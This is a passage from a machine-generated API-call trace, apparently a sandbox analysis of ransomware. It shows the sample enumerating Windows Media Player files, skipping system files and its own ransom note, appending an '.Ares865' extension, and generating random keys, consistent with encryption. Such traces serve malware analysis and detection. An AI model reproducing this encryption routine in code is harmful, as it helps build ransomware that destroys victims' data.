RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0122.441] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0122.441] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.442] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.442] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.442] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdf00, lpName=0x0) returned 0x170 [0122.444] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf00) returned 0x190000 [0122.453] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.454] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.454] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.454] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0122.454] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0122.454] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0122.454] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0122.454] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0122.454] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0122.454] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0122.455] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0122.455] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0122.455] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0122.455] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0122.455] CloseHandle (hObject=0x170) returned 1 [0122.455] CloseHandle (hObject=0x118) returned 1 [0122.456] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0122.456] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0122.456] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0122.456] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdc7162, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfdc7162, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wmlaunch.exe.mui", cAlternateFileName="")) returned 1 [0122.456] lstrcmpiW (lpString1="wmlaunch.exe.mui", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0122.456] lstrcmpiW (lpString1="wmlaunch.exe.mui", lpString2="aoldtz.exe") returned 1 [0122.456] lstrcmpiW (lpString1="wmlaunch.exe.mui", lpString2=".") returned 1 [0122.456] lstrcmpiW (lpString1="wmlaunch.exe.mui", lpString2="..") returned 1 [0122.456] lstrcmpiW (lpString1="wmlaunch.exe.mui", lpString2="windows") returned 1 [0122.456] lstrcmpiW (lpString1="wmlaunch.exe.mui", lpString2="bootmgr") returned 1 [0122.456] lstrcmpiW (lpString1="wmlaunch.exe.mui", lpString2="temp") returned 1 [0122.456] lstrcmpiW (lpString1="wmlaunch.exe.mui", lpString2="pagefile.sys") returned 1 [0122.456] lstrcmpiW (lpString1="wmlaunch.exe.mui", lpString2="boot") returned 1 [0122.456] lstrcmpiW (lpString1="wmlaunch.exe.mui", lpString2="ids.txt") returned 1 [0122.456] lstrcmpiW (lpString1="wmlaunch.exe.mui", lpString2="ntuser.dat") returned 1 [0122.456] lstrcmpiW (lpString1="wmlaunch.exe.mui", lpString2="perflogs") returned 1 [0122.456] lstrcmpiW (lpString1="wmlaunch.exe.mui", lpString2="MSBuild") returned 1 [0122.456] lstrlenW (lpString="wmlaunch.exe.mui") returned 16 [0122.456] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Media Player\\en-US\\setup_wm.exe.mui") returned 66 [0122.457] lstrcpyW (in: lpString1=0x2cce464, lpString2="wmlaunch.exe.mui" | out: lpString1="wmlaunch.exe.mui") returned="wmlaunch.exe.mui" [0122.457] lstrlenW (lpString="wmlaunch.exe.mui") returned 16 [0122.457] lstrlenW (lpString="Ares865") returned 7 [0122.457] lstrcmpiW (lpString1="exe.mui", lpString2="Ares865") returned 1 [0122.457] lstrlenW (lpString=".dll") returned 4 [0122.457] lstrcmpiW (lpString1="wmlaunch.exe.mui", lpString2=".dll") returned 1 [0122.457] lstrlenW (lpString=".lnk") returned 4 [0122.457] lstrcmpiW (lpString1="wmlaunch.exe.mui", lpString2=".lnk") returned 1 [0122.457] lstrlenW (lpString=".ini") returned 4 [0122.457] lstrcmpiW (lpString1="wmlaunch.exe.mui", lpString2=".ini") returned 1 [0122.457] lstrlenW (lpString=".sys") returned 4 [0122.457] lstrcmpiW (lpString1="wmlaunch.exe.mui", lpString2=".sys") returned 1 [0122.457] lstrlenW (lpString="wmlaunch.exe.mui") returned 16 [0122.457] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmlaunch.exe.mui.Ares865") returned 74 [0122.458] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmlaunch.exe.mui" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmlaunch.exe.mui"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmlaunch.exe.mui.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmlaunch.exe.mui.ares865"), dwFlags=0x1) returned 1 [0122.460] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmlaunch.exe.mui.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmlaunch.exe.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.460] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2048) returned 1 [0122.460] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0122.460] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0122.460] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0122.460] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.461] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.461] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.461] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb00, lpName=0x0) returned 0x170 [0122.463] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb00) returned 0x190000 [0122.466] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.466] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.466] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.466] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0122.467] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0122.467] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0122.467] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0122.467] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0122.467] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0122.467] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0122.467] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0122.467] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0122.467] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0122.467] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0122.467] CloseHandle (hObject=0x170) returned 1 [0122.467] CloseHandle (hObject=0x118) returned 1 [0122.467] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0122.467] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0122.467] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0122.468] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WMPDMC.exe.mui", cAlternateFileName="")) returned 1 [0122.468] lstrcmpiW (lpString1="WMPDMC.exe.mui", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0122.468] lstrcmpiW (lpString1="WMPDMC.exe.mui", lpString2="aoldtz.exe") returned 1 [0122.468] lstrcmpiW (lpString1="WMPDMC.exe.mui", lpString2=".") returned 1 [0122.468] lstrcmpiW (lpString1="WMPDMC.exe.mui", lpString2="..") returned 1 [0122.468] lstrcmpiW (lpString1="WMPDMC.exe.mui", lpString2="windows") returned 1 [0122.468] lstrcmpiW (lpString1="WMPDMC.exe.mui", lpString2="bootmgr") returned 1 [0122.468] lstrcmpiW (lpString1="WMPDMC.exe.mui", lpString2="temp") returned 1 [0122.468] lstrcmpiW (lpString1="WMPDMC.exe.mui", lpString2="pagefile.sys") returned 1 [0122.468] lstrcmpiW (lpString1="WMPDMC.exe.mui", lpString2="boot") returned 1 [0122.468] lstrcmpiW (lpString1="WMPDMC.exe.mui", lpString2="ids.txt") returned 1 [0122.468] lstrcmpiW (lpString1="WMPDMC.exe.mui", lpString2="ntuser.dat") returned 1 [0122.468] lstrcmpiW (lpString1="WMPDMC.exe.mui", lpString2="perflogs") returned 1 [0122.468] lstrcmpiW (lpString1="WMPDMC.exe.mui", lpString2="MSBuild") returned 1 [0122.468] lstrlenW (lpString="WMPDMC.exe.mui") returned 14 [0122.468] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmlaunch.exe.mui") returned 66 [0122.468] lstrcpyW (in: lpString1=0x2cce464, lpString2="WMPDMC.exe.mui" | out: lpString1="WMPDMC.exe.mui") returned="WMPDMC.exe.mui" [0122.468] lstrlenW (lpString="WMPDMC.exe.mui") returned 14 [0122.468] lstrlenW (lpString="Ares865") returned 7 [0122.468] lstrcmpiW (lpString1="exe.mui", lpString2="Ares865") returned 1 [0122.468] lstrlenW (lpString=".dll") returned 4 [0122.468] lstrcmpiW (lpString1="WMPDMC.exe.mui", lpString2=".dll") returned 1 [0122.468] lstrlenW (lpString=".lnk") returned 4 [0122.468] lstrcmpiW (lpString1="WMPDMC.exe.mui", lpString2=".lnk") returned 1 [0122.468] lstrlenW (lpString=".ini") returned 4 [0122.468] lstrcmpiW (lpString1="WMPDMC.exe.mui", lpString2=".ini") returned 1 [0122.468] lstrlenW (lpString=".sys") returned 4 [0122.468] lstrcmpiW (lpString1="WMPDMC.exe.mui", lpString2=".sys") returned 1 [0122.468] lstrlenW (lpString="WMPDMC.exe.mui") returned 14 [0122.469] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMC.exe.mui.Ares865") returned 72 [0122.469] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMC.exe.mui" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpdmc.exe.mui"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMC.exe.mui.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpdmc.exe.mui.ares865"), dwFlags=0x1) returned 1 [0122.471] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMC.exe.mui.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpdmc.exe.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.471] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14848) returned 1 [0122.471] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0122.471] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0122.471] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0122.471] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.472] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.472] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.472] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3d00, lpName=0x0) returned 0x170 [0122.474] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3d00) returned 0x190000 [0122.475] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.476] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.476] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.476] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0122.476] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0122.476] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0122.476] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0122.476] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0122.476] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0122.476] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0122.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0122.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0122.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0122.477] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0122.477] CloseHandle (hObject=0x170) returned 1 [0122.477] CloseHandle (hObject=0x118) returned 1 [0122.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0122.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0122.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0122.477] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WMPDMCCore.dll.mui", cAlternateFileName="")) returned 1 [0122.477] lstrcmpiW (lpString1="WMPDMCCore.dll.mui", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0122.477] lstrcmpiW (lpString1="WMPDMCCore.dll.mui", lpString2="aoldtz.exe") returned 1 [0122.477] lstrcmpiW (lpString1="WMPDMCCore.dll.mui", lpString2=".") returned 1 [0122.477] lstrcmpiW (lpString1="WMPDMCCore.dll.mui", lpString2="..") returned 1 [0122.477] lstrcmpiW (lpString1="WMPDMCCore.dll.mui", lpString2="windows") returned 1 [0122.478] lstrcmpiW (lpString1="WMPDMCCore.dll.mui", lpString2="bootmgr") returned 1 [0122.478] lstrcmpiW (lpString1="WMPDMCCore.dll.mui", lpString2="temp") returned 1 [0122.478] lstrcmpiW (lpString1="WMPDMCCore.dll.mui", lpString2="pagefile.sys") returned 1 [0122.478] lstrcmpiW (lpString1="WMPDMCCore.dll.mui", lpString2="boot") returned 1 [0122.478] lstrcmpiW (lpString1="WMPDMCCore.dll.mui", lpString2="ids.txt") returned 1 [0122.478] lstrcmpiW (lpString1="WMPDMCCore.dll.mui", lpString2="ntuser.dat") returned 1 [0122.478] lstrcmpiW (lpString1="WMPDMCCore.dll.mui", lpString2="perflogs") returned 1 [0122.478] lstrcmpiW (lpString1="WMPDMCCore.dll.mui", lpString2="MSBuild") returned 1 [0122.478] lstrlenW (lpString="WMPDMCCore.dll.mui") returned 18 [0122.478] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMC.exe.mui") returned 64 [0122.478] lstrcpyW (in: lpString1=0x2cce464, lpString2="WMPDMCCore.dll.mui" | out: lpString1="WMPDMCCore.dll.mui") returned="WMPDMCCore.dll.mui" [0122.478] lstrlenW (lpString="WMPDMCCore.dll.mui") returned 18 [0122.478] lstrlenW (lpString="Ares865") returned 7 [0122.478] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0122.478] lstrlenW (lpString=".dll") returned 4 [0122.478] lstrcmpiW (lpString1="WMPDMCCore.dll.mui", lpString2=".dll") returned 1 [0122.478] lstrlenW (lpString=".lnk") returned 4 [0122.478] lstrcmpiW (lpString1="WMPDMCCore.dll.mui", lpString2=".lnk") returned 1 [0122.478] lstrlenW (lpString=".ini") returned 4 [0122.478] lstrcmpiW (lpString1="WMPDMCCore.dll.mui", lpString2=".ini") returned 1 [0122.478] lstrlenW (lpString=".sys") returned 4 [0122.478] lstrcmpiW (lpString1="WMPDMCCore.dll.mui", lpString2=".sys") returned 1 [0122.478] lstrlenW (lpString="WMPDMCCore.dll.mui") returned 18 [0122.479] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMCCore.dll.mui.Ares865") returned 76 [0122.479] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMCCore.dll.mui" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpdmccore.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMCCore.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpdmccore.dll.mui.ares865"), dwFlags=0x1) returned 1 [0122.480] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMCCore.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpdmccore.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.481] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0122.481] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0122.481] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0122.481] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0122.481] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.482] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.482] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.482] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd00, lpName=0x0) returned 0x170 [0122.485] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd00) returned 0x190000 [0122.489] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.490] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.490] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.490] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0122.490] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0122.490] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0122.490] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0122.490] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0122.490] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0122.490] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0122.491] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0122.491] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0122.491] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0122.491] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0122.491] CloseHandle (hObject=0x170) returned 1 [0122.491] CloseHandle (hObject=0x118) returned 1 [0122.491] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0122.491] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0122.491] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0122.491] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdc7162, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfdc7162, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wmplayer.exe.mui", cAlternateFileName="")) returned 1 [0122.491] lstrcmpiW (lpString1="wmplayer.exe.mui", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0122.491] lstrcmpiW (lpString1="wmplayer.exe.mui", lpString2="aoldtz.exe") returned 1 [0122.491] lstrcmpiW (lpString1="wmplayer.exe.mui", lpString2=".") returned 1 [0122.491] lstrcmpiW (lpString1="wmplayer.exe.mui", lpString2="..") returned 1 [0122.491] lstrcmpiW (lpString1="wmplayer.exe.mui", lpString2="windows") returned 1 [0122.492] lstrcmpiW (lpString1="wmplayer.exe.mui", lpString2="bootmgr") returned 1 [0122.492] lstrcmpiW (lpString1="wmplayer.exe.mui", lpString2="temp") returned 1 [0122.492] lstrcmpiW (lpString1="wmplayer.exe.mui", lpString2="pagefile.sys") returned 1 [0122.492] lstrcmpiW (lpString1="wmplayer.exe.mui", lpString2="boot") returned 1 [0122.492] lstrcmpiW (lpString1="wmplayer.exe.mui", lpString2="ids.txt") returned 1 [0122.492] lstrcmpiW (lpString1="wmplayer.exe.mui", lpString2="ntuser.dat") returned 1 [0122.492] lstrcmpiW (lpString1="wmplayer.exe.mui", lpString2="perflogs") returned 1 [0122.492] lstrcmpiW (lpString1="wmplayer.exe.mui", lpString2="MSBuild") returned 1 [0122.492] lstrlenW (lpString="wmplayer.exe.mui") returned 16 [0122.492] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMCCore.dll.mui") returned 68 [0122.492] lstrcpyW (in: lpString1=0x2cce464, lpString2="wmplayer.exe.mui" | out: lpString1="wmplayer.exe.mui") returned="wmplayer.exe.mui" [0122.492] lstrlenW (lpString="wmplayer.exe.mui") returned 16 [0122.492] lstrlenW (lpString="Ares865") returned 7 [0122.492] lstrcmpiW (lpString1="exe.mui", lpString2="Ares865") returned 1 [0122.492] lstrlenW (lpString=".dll") returned 4 [0122.492] lstrcmpiW (lpString1="wmplayer.exe.mui", lpString2=".dll") returned 1 [0122.492] lstrlenW (lpString=".lnk") returned 4 [0122.492] lstrcmpiW (lpString1="wmplayer.exe.mui", lpString2=".lnk") returned 1 [0122.492] lstrlenW (lpString=".ini") returned 4 [0122.492] lstrcmpiW (lpString1="wmplayer.exe.mui", lpString2=".ini") returned 1 [0122.492] lstrlenW (lpString=".sys") returned 4 [0122.492] lstrcmpiW (lpString1="wmplayer.exe.mui", lpString2=".sys") returned 1 [0122.492] lstrlenW (lpString="wmplayer.exe.mui") returned 16 [0122.493] wsprintfW 